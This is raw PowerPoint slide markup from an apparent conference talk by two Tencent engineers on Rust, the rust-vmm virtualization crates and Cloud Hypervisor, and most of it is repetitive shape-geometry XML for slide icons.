            <a:ext cx="2560803" cy="256080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C515257-7B0C-4244-826F-5820A2613D0E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Rust</a:t>
            </a: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B46D32-AD66-9548-B0BF-2107CB40B338}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="748322" y="3195653"/>
            <a:ext cx="79452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400" dirty="0"/>
              <a:t>New language with a focus on correctness and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C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CN" sz="2400" dirty="0"/>
              <a:t>ompiled to native code offering performance similar to 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400" dirty="0"/>
              <a:t>Memory management without garbage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D</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CN" sz="2400" dirty="0"/>
              <a:t>esigned for systems programming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1E4998-D43D-B74A-8C3B-42B4AF833047}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="537028" y="1504048"/>
            <a:ext cx="107173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Rust is a multi-paradigm programming language focused on performance and safety, especially safe concurrency</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty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63145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04DC72B-1E3D-5E4C-8651-CDEC1D20DF0C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Us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4E04BF-0024-7841-8717-3E8599BA0722}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2214715" y="1873625"/>
            <a:ext cx="599017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/>
              <a:t>Yingzhe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> Ru</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Senior Software Engineer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Tencent</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>W</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>orking on TKEStack project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great interest and enthusiasm in Cloud</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Native and Open</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Source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D06162-9545-3543-ABCE-EBBA9274B01E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4142837" y="4297440"/>
            <a:ext cx="599017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/>
              <a:t>Liangyu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> Zhou</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Senior Software Engineer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Tencent</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Rich experience in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ontainer and Kubernetes field, promote lots of K8S production practice in Tencent</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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2C1725-326D-0640-84D8-704939F61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78227" y="3870600"/>
            <a:ext cx="1819406" cy="19448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F75823-861A-B04B-8827-D1F94688D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887" y="1576429"/>
            <a:ext cx="1831319" cy="196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894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CFB6B3-E945-C34B-81D4-050CDC18AA02}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1054457" y="1492193"/>
            <a:ext cx="923617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empty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vmm-vcpu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a hypervisor-agnostic abstraction for Virtual CPUs (vCPUs).</a:t>
            </a:r>
          </a:p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rust-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vmm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event-manager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abstractions for implementing event based systems.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linux-loader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parser and loader for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vmlinux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bzImage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images as well as some other helpers for kernel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commandline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vm-virtio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virtio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device trait and implementation for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virtio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primitives such as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virtqueues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descriptor chain.</a:t>
            </a:r>
          </a:p>
          <a:p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crates.io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kvm-bindings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Rust FFI bindings to KVM generated using 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bindgen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kvm-ioctls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Safe wrappers over the KVM API.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vfio-bindings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Rust FFI bindings for using the VFIO framework.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virtio-bindings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Rust FFI bindings to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virtio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kernel headers generated using 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bindgen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vm-memory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abstractions over a virtual machine's memory.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vmm-sys-util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collection of modules providing helpers and utilities for building VMMs and hypervisors.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ACA4979-E2CD-3C4B-8259-381A332D6D95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Release Crates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624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C07778C-EF0A-7C47-8287-C3638209998B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</a:t>
            </a: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Hypervisor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5ED5FA-0448-4645-83AD-60E6C05EFB0A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="675860" y="1842053"/>
            <a:ext cx="1074751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Cloud Hypervisor is an open source Virtual Machine Monitor (VMM) that runs on top of KVM. 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Implemented in Rust and is based on the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>R</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>ust-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>VMM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> crates</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/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The project focuses on running modern, cloud workloads, on top of a limited set of hardware architectures and platforms</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-CN" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="315822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73">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4AA2BCDB-9949-3547-B843-986782C905AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7696107" y="2722608"/>
            <a:ext cx="3449688" cy="3356917"/>
            <a:chOff x="16297250" y="4050482"/>
            <a:chExt cx="5698405" cy="5681645"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="3" name="Группа 174">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3839FD6-A1A6-4D4E-B904-E7ED688DBA40}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="16542104" y="4196413"/>
              <a:ext cx="5453551" cy="5535714"/>
              <a:chOff x="19899515" y="11828561"/>
              <a:chExt cx="1685925" cy="1711325"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="5" name="Freeform 566">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A999D22-18F5-2A41-9480-D236D90CE5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15490" y="13108085"/>
                <a:ext cx="425450" cy="425450"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 134"/>
                  <a:gd name="T1" fmla="*/ 4 h 134"/>
                  <a:gd name="T2" fmla="*/ 4 w 134"/>
                  <a:gd name="T3" fmla="*/ 0 h 134"/>
                  <a:gd name="T4" fmla="*/ 130 w 134"/>
                  <a:gd name="T5" fmla="*/ 0 h 134"/>
                  <a:gd name="T6" fmla="*/ 134 w 134"/>
                  <a:gd name="T7" fmla="*/ 4 h 134"/>
                  <a:gd name="T8" fmla="*/ 134 w 134"/>
                  <a:gd name="T9" fmla="*/ 130 h 134"/>
                  <a:gd name="T10" fmla="*/ 130 w 134"/>
                  <a:gd name="T11" fmla="*/ 134 h 134"/>
                  <a:gd name="T12" fmla="*/ 4 w 134"/>
                  <a:gd name="T13" fmla="*/ 134 h 134"/>
                  <a:gd name="T14" fmla="*/ 0 w 134"/>
                  <a:gd name="T15" fmla="*/ 130 h 134"/>
                  <a:gd name="T16" fmla="*/ 0 w 134"/>
                  <a:gd name="T17" fmla="*/ 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4" h="134">
                    <a:moveTo>
                      <a:pt x="0" y="4"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="2"/>
                      <a:pt x="2" y="0"/>
                      <a:pt x="4" y="0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132" y="0"/>
                      <a:pt x="134" y="2"/>
                      <a:pt x="134" y="4"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="134" y="130"/>
                      <a:pt x="134" y="130"/>
                      <a:pt x="134" y="130"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="134" y="132"/>
                      <a:pt x="132" y="134"/>
                      <a:pt x="130" y="134"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="134"/>
                      <a:pt x="4" y="134"/>
                      <a:pt x="4" y="134"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="134"/>
                      <a:pt x="0" y="132"/>
                      <a:pt x="0" y="130"/>
                    </a:cubicBez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6" name="Freeform 567">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C5679DFD-2E2D-0242-9E51-F1884B196B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50440" y="13438285"/>
                <a:ext cx="76200" cy="76200"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 24 w 24"/>
                  <a:gd name="T1" fmla="*/ 21 h 24"/>
                  <a:gd name="T2" fmla="*/ 21 w 24"/>
                  <a:gd name="T3" fmla="*/ 24 h 24"/>
                  <a:gd name="T4" fmla="*/ 4 w 24"/>
                  <a:gd name="T5" fmla="*/ 24 h 24"/>
                  <a:gd name="T6" fmla="*/ 0 w 24"/>
                  <a:gd name="T7" fmla="*/ 21 h 24"/>
                  <a:gd name="T8" fmla="*/ 0 w 24"/>
                  <a:gd name="T9" fmla="*/ 4 h 24"/>
                  <a:gd name="T10" fmla="*/ 4 w 24"/>
                  <a:gd name="T11" fmla="*/ 0 h 24"/>
                  <a:gd name="T12" fmla="*/ 21 w 24"/>
                  <a:gd name="T13" fmla="*/ 0 h 24"/>
                  <a:gd name="T14" fmla="*/ 24 w 24"/>
                  <a:gd name="T15" fmla="*/ 4 h 24"/>
                  <a:gd name="T16" fmla="*/ 24 w 24"/>
                  <a:gd name="T17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4">
                    <a:moveTo>
                      <a:pt x="24" y="21"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="23"/>
                      <a:pt x="22" y="24"/>
                      <a:pt x="21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2" y="24"/>
                      <a:pt x="0" y="23"/>
                      <a:pt x="0" y="2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2" y="0"/>
                      <a:pt x="24" y="2"/>
                      <a:pt x="24" y="4"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="24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7" name="Freeform 568">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5DF7FBA1-4A50-AB47-B011-DECA65995E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55190" y="13438285"/>
                <a:ext cx="76200" cy="76200"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 24 w 24"/>
                  <a:gd name="T1" fmla="*/ 21 h 24"/>
                  <a:gd name="T2" fmla="*/ 21 w 24"/>
                  <a:gd name="T3" fmla="*/ 24 h 24"/>
                  <a:gd name="T4" fmla="*/ 4 w 24"/>
                  <a:gd name="T5" fmla="*/ 24 h 24"/>
                  <a:gd name="T6" fmla="*/ 0 w 24"/>
                  <a:gd name="T7" fmla="*/ 21 h 24"/>
                  <a:gd name="T8" fmla="*/ 0 w 24"/>
                  <a:gd name="T9" fmla="*/ 4 h 24"/>
                  <a:gd name="T10" fmla="*/ 4 w 24"/>
                  <a:gd name="T11" fmla="*/ 0 h 24"/>
                  <a:gd name="T12" fmla="*/ 21 w 24"/>
                  <a:gd name="T13" fmla="*/ 0 h 24"/>
                  <a:gd name="T14" fmla="*/ 24 w 24"/>
                  <a:gd name="T15" fmla="*/ 4 h 24"/>
                  <a:gd name="T16" fmla="*/ 24 w 24"/>
                  <a:gd name="T17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4">
                    <a:moveTo>
                      <a:pt x="24" y="21"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="23"/>
                      <a:pt x="22" y="24"/>
                      <a:pt x="21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2" y="24"/>
                      <a:pt x="0" y="23"/>
                      <a:pt x="0" y="2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2" y="0"/>
                      <a:pt x="24" y="2"/>
                      <a:pt x="24" y="4"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="24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" name="Freeform 569">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B1860CFC-41F1-9D46-8650-B71E2CAB7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45690" y="13438285"/>
                <a:ext cx="76200" cy="76200"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 24 w 24"/>
                  <a:gd name="T1" fmla="*/ 21 h 24"/>
                  <a:gd name="T2" fmla="*/ 21 w 24"/>
                  <a:gd name="T3" fmla="*/ 24 h 24"/>
                  <a:gd name="T4" fmla="*/ 4 w 24"/>
                  <a:gd name="T5" fmla="*/ 24 h 24"/>
                  <a:gd name="T6" fmla="*/ 0 w 24"/>
                  <a:gd name="T7" fmla="*/ 21 h 24"/>
                  <a:gd name="T8" fmla="*/ 0 w 24"/>
                  <a:gd name="T9" fmla="*/ 4 h 24"/>
                  <a:gd name="T10" fmla="*/ 4 w 24"/>
                  <a:gd name="T11" fmla="*/ 0 h 24"/>
                  <a:gd name="T12" fmla="*/ 21 w 24"/>
                  <a:gd name="T13" fmla="*/ 0 h 24"/>
                  <a:gd name="T14" fmla="*/ 24 w 24"/>
                  <a:gd name="T15" fmla="*/ 4 h 24"/>
                  <a:gd name="T16" fmla="*/ 24 w 24"/>
                  <a:gd name="T17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4">
                    <a:moveTo>
                      <a:pt x="24" y="21"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="23"/>
                      <a:pt x="22" y="24"/>
                      <a:pt x="21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2" y="24"/>
                      <a:pt x="0" y="23"/>
                      <a:pt x="0" y="2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2" y="0"/>
                      <a:pt x="24" y="2"/>
                      <a:pt x="24" y="4"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="24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" name="Freeform 570">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EFEC2854-C979-2C4F-A227-3066C9ECBF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15490" y="12663585"/>
                <a:ext cx="425450" cy="425450"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 134"/>
                  <a:gd name="T1" fmla="*/ 4 h 134"/>
                  <a:gd name="T2" fmla="*/ 4 w 134"/>
                  <a:gd name="T3" fmla="*/ 0 h 134"/>
                  <a:gd name="T4" fmla="*/ 130 w 134"/>
                  <a:gd name="T5" fmla="*/ 0 h 134"/>
                  <a:gd name="T6" fmla="*/ 134 w 134"/>
                  <a:gd name="T7" fmla="*/ 4 h 134"/>
                  <a:gd name="T8" fmla="*/ 134 w 134"/>
                  <a:gd name="T9" fmla="*/ 130 h 134"/>
                  <a:gd name="T10" fmla="*/ 130 w 134"/>
                  <a:gd name="T11" fmla="*/ 134 h 134"/>
                  <a:gd name="T12" fmla="*/ 4 w 134"/>
                  <a:gd name="T13" fmla="*/ 134 h 134"/>
                  <a:gd name="T14" fmla="*/ 0 w 134"/>
                  <a:gd name="T15" fmla="*/ 130 h 134"/>
                  <a:gd name="T16" fmla="*/ 0 w 134"/>
                  <a:gd name="T17" fmla="*/ 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4" h="134">
                    <a:moveTo>
                      <a:pt x="0" y="4"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="2"/>
                      <a:pt x="2" y="0"/>
                      <a:pt x="4" y="0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132" y="0"/>
                      <a:pt x="134" y="2"/>
                      <a:pt x="134" y="4"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="134" y="130"/>
                      <a:pt x="134" y="130"/>
                      <a:pt x="134" y="130"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="134" y="132"/>
                      <a:pt x="132" y="134"/>
                      <a:pt x="130" y="134"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="134"/>
                      <a:pt x="4" y="134"/>
                      <a:pt x="4" y="134"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="134"/>
                      <a:pt x="0" y="132"/>
                      <a:pt x="0" y="130"/>
                    </a:cubicBez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" name="Freeform 571">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10A2B87F-90F0-574D-B859-0D9259B955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50440" y="12993785"/>
                <a:ext cx="76200" cy="76200"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 24 w 24"/>
                  <a:gd name="T1" fmla="*/ 21 h 24"/>
                  <a:gd name="T2" fmla="*/ 21 w 24"/>
                  <a:gd name="T3" fmla="*/ 24 h 24"/>
                  <a:gd name="T4" fmla="*/ 4 w 24"/>
                  <a:gd name="T5" fmla="*/ 24 h 24"/>
                  <a:gd name="T6" fmla="*/ 0 w 24"/>
                  <a:gd name="T7" fmla="*/ 21 h 24"/>
                  <a:gd name="T8" fmla="*/ 0 w 24"/>
                  <a:gd name="T9" fmla="*/ 4 h 24"/>
                  <a:gd name="T10" fmla="*/ 4 w 24"/>
                  <a:gd name="T11" fmla="*/ 0 h 24"/>
                  <a:gd name="T12" fmla="*/ 21 w 24"/>
                  <a:gd name="T13" fmla="*/ 0 h 24"/>
                  <a:gd name="T14" fmla="*/ 24 w 24"/>
                  <a:gd name="T15" fmla="*/ 4 h 24"/>
                  <a:gd name="T16" fmla="*/ 24 w 24"/>
                  <a:gd name="T17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4">
                    <a:moveTo>
                      <a:pt x="24" y="21"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="23"/>
                      <a:pt x="22" y="24"/>
                      <a:pt x="21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2" y="24"/>
                      <a:pt x="0" y="23"/>
                      <a:pt x="0" y="2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2" y="0"/>
                      <a:pt x="24" y="2"/>
                      <a:pt x="24" y="4"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="24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1" name="Freeform 572">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2EF9C446-5F79-DB41-85B2-CDE359508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55190" y="12993785"/>
                <a:ext cx="76200" cy="76200"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 24 w 24"/>
                  <a:gd name="T1" fmla="*/ 21 h 24"/>
                  <a:gd name="T2" fmla="*/ 21 w 24"/>
                  <a:gd name="T3" fmla="*/ 24 h 24"/>
                  <a:gd name="T4" fmla="*/ 4 w 24"/>
                  <a:gd name="T5" fmla="*/ 24 h 24"/>
                  <a:gd name="T6" fmla="*/ 0 w 24"/>
                  <a:gd name="T7" fmla="*/ 21 h 24"/>
                  <a:gd name="T8" fmla="*/ 0 w 24"/>
                  <a:gd name="T9" fmla="*/ 4 h 24"/>
                  <a:gd name="T10" fmla="*/ 4 w 24"/>
                  <a:gd name="T11" fmla="*/ 0 h 24"/>
                  <a:gd name="T12" fmla="*/ 21 w 24"/>
                  <a:gd name="T13" fmla="*/ 0 h 24"/>
                  <a:gd name="T14" fmla="*/ 24 w 24"/>
                  <a:gd name="T15" fmla="*/ 4 h 24"/>
                  <a:gd name="T16" fmla="*/ 24 w 24"/>
                  <a:gd name="T17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4">
                    <a:moveTo>
                      <a:pt x="24" y="21"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="23"/>
                      <a:pt x="22" y="24"/>
                      <a:pt x="21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2" y="24"/>
                      <a:pt x="0" y="23"/>
                      <a:pt x="0" y="2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2" y="0"/>
                      <a:pt x="24" y="2"/>
                      <a:pt x="24" y="4"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="24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2" name="Freeform 573">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4A91F74-EA6F-2B45-BE26-159875302D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45690" y="12993785"/>
                <a:ext cx="76200" cy="76200"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 24 w 24"/>
                  <a:gd name="T1" fmla="*/ 21 h 24"/>
                  <a:gd name="T2" fmla="*/ 21 w 24"/>
                  <a:gd name="T3" fmla="*/ 24 h 24"/>
                  <a:gd name="T4" fmla="*/ 4 w 24"/>
                  <a:gd name="T5" fmla="*/ 24 h 24"/>
                  <a:gd name="T6" fmla="*/ 0 w 24"/>
                  <a:gd name="T7" fmla="*/ 21 h 24"/>
                  <a:gd name="T8" fmla="*/ 0 w 24"/>
                  <a:gd name="T9" fmla="*/ 4 h 24"/>
                  <a:gd name="T10" fmla="*/ 4 w 24"/>
                  <a:gd name="T11" fmla="*/ 0 h 24"/>
                  <a:gd name="T12" fmla="*/ 21 w 24"/>
                  <a:gd name="T13" fmla="*/ 0 h 24"/>
                  <a:gd name="T14" fmla="*/ 24 w 24"/>
                  <a:gd name="T15" fmla="*/ 4 h 24"/>
                  <a:gd name="T16" fmla="*/ 24 w 24"/>
                  <a:gd name="T17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4">
                    <a:moveTo>
                      <a:pt x="24" y="21"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="23"/>
                      <a:pt x="22" y="24"/>
                      <a:pt x="21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2" y="24"/>
                      <a:pt x="0" y="23"/>
                      <a:pt x="0" y="2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2" y="0"/>
                      <a:pt x="24" y="2"/>
                      <a:pt x="24" y="4"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="24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3" name="Freeform 574">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F222853-4689-324C-B920-419538FEE2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59990" y="13108085"/>
                <a:ext cx="425450" cy="425450"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 134"/>
                  <a:gd name="T1" fmla="*/ 4 h 134"/>
                  <a:gd name="T2" fmla="*/ 4 w 134"/>
                  <a:gd name="T3" fmla="*/ 0 h 134"/>
                  <a:gd name="T4" fmla="*/ 130 w 134"/>
                  <a:gd name="T5" fmla="*/ 0 h 134"/>
                  <a:gd name="T6" fmla="*/ 134 w 134"/>
                  <a:gd name="T7" fmla="*/ 4 h 134"/>
                  <a:gd name="T8" fmla="*/ 134 w 134"/>
                  <a:gd name="T9" fmla="*/ 130 h 134"/>
                  <a:gd name="T10" fmla="*/ 130 w 134"/>
                  <a:gd name="T11" fmla="*/ 134 h 134"/>
                  <a:gd name="T12" fmla="*/ 4 w 134"/>
                  <a:gd name="T13" fmla="*/ 134 h 134"/>
                  <a:gd name="T14" fmla="*/ 0 w 134"/>
                  <a:gd name="T15" fmla="*/ 130 h 134"/>
                  <a:gd name="T16" fmla="*/ 0 w 134"/>
                  <a:gd name="T17" fmla="*/ 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4" h="134">
                    <a:moveTo>
                      <a:pt x="0" y="4"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="2"/>
                      <a:pt x="2" y="0"/>
                      <a:pt x="4" y="0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132" y="0"/>
                      <a:pt x="134" y="2"/>
                      <a:pt x="134" y="4"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="134" y="130"/>
                      <a:pt x="134" y="130"/>
                      <a:pt x="134" y="130"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="134" y="132"/>
                      <a:pt x="132" y="134"/>
                      <a:pt x="130" y="134"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="134"/>
                      <a:pt x="4" y="134"/>
                      <a:pt x="4" y="134"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="134"/>
                      <a:pt x="0" y="132"/>
                      <a:pt x="0" y="130"/>
                    </a:cubicBez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4" name="Freeform 575">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FF84CF48-7B0A-F940-A375-4D724950E6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94940" y="13438285"/>
                <a:ext cx="76200" cy="76200"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 24 w 24"/>
                  <a:gd name="T1" fmla="*/ 21 h 24"/>
                  <a:gd name="T2" fmla="*/ 21 w 24"/>
                  <a:gd name="T3" fmla="*/ 24 h 24"/>
                  <a:gd name="T4" fmla="*/ 4 w 24"/>
                  <a:gd name="T5" fmla="*/ 24 h 24"/>
                  <a:gd name="T6" fmla="*/ 0 w 24"/>
                  <a:gd name="T7" fmla="*/ 21 h 24"/>
                  <a:gd name="T8" fmla="*/ 0 w 24"/>
                  <a:gd name="T9" fmla="*/ 4 h 24"/>
                  <a:gd name="T10" fmla="*/ 4 w 24"/>
                  <a:gd name="T11" fmla="*/ 0 h 24"/>
                  <a:gd name="T12" fmla="*/ 21 w 24"/>
                  <a:gd name="T13" fmla="*/ 0 h 24"/>
                  <a:gd name="T14" fmla="*/ 24 w 24"/>
                  <a:gd name="T15" fmla="*/ 4 h 24"/>
                  <a:gd name="T16" fmla="*/ 24 w 24"/>
                  <a:gd name="T17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4">
                    <a:moveTo>
                      <a:pt x="24" y="21"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="23"/>
                      <a:pt x="22" y="24"/>
                      <a:pt x="21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2" y="24"/>
                      <a:pt x="0" y="23"/>
                      <a:pt x="0" y="2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2" y="0"/>
                      <a:pt x="24" y="2"/>
                      <a:pt x="24" y="4"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="24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5" name="Freeform 576">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73112052-81AC-3549-BA3C-CF8C07E990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99690" y="13438285"/>
                <a:ext cx="76200" cy="76200"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 24 w 24"/>
                  <a:gd name="T1" fmla="*/ 21 h 24"/>
                  <a:gd name="T2" fmla="*/ 21 w 24"/>
                  <a:gd name="T3" fmla="*/ 24 h 24"/>
                  <a:gd name="T4" fmla="*/ 4 w 24"/>
                  <a:gd name="T5" fmla="*/ 24 h 24"/>
                  <a:gd name="T6" fmla="*/ 0 w 24"/>
                  <a:gd name="T7" fmla="*/ 21 h 24"/>
                  <a:gd name="T8" fmla="*/ 0 w 24"/>
                  <a:gd name="T9" fmla="*/ 4 h 24"/>
                  <a:gd name="T10" fmla="*/ 4 w 24"/>
